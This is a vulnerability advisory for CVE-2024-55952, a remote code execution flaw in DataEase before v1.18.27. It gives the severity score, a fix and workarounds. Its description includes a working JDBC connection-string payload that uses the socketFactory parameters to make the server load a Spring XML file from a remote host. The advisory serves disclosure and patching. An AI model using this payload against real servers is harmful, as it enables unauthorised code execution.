PT-2024-36616 · Dataease · Dataease

H4Cking2Thegate

·

Published

2024-12-18

·

Updated

2025-02-20

·

CVE-2024-55952

CVSS v3.1

8.8

High

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions DataEase versions prior to v1.18.27
Description DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the JDBC connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method.
Recommendations For versions prior to v1.18.27, update to version v1.18.27 or later to resolve the issue. As a temporary workaround, consider restricting access to the JDBC connection to minimize the risk of exploitation. Avoid using the socketFactory and socketFactoryArg parameters in the JDBC connection string until the issue is resolved.

Exploit

Fix

RCE

Weakness Enumeration

Related Identifiers

CVE-2024-55952
GHSA-W8QM-XW38-93QW

Affected Products

Dataease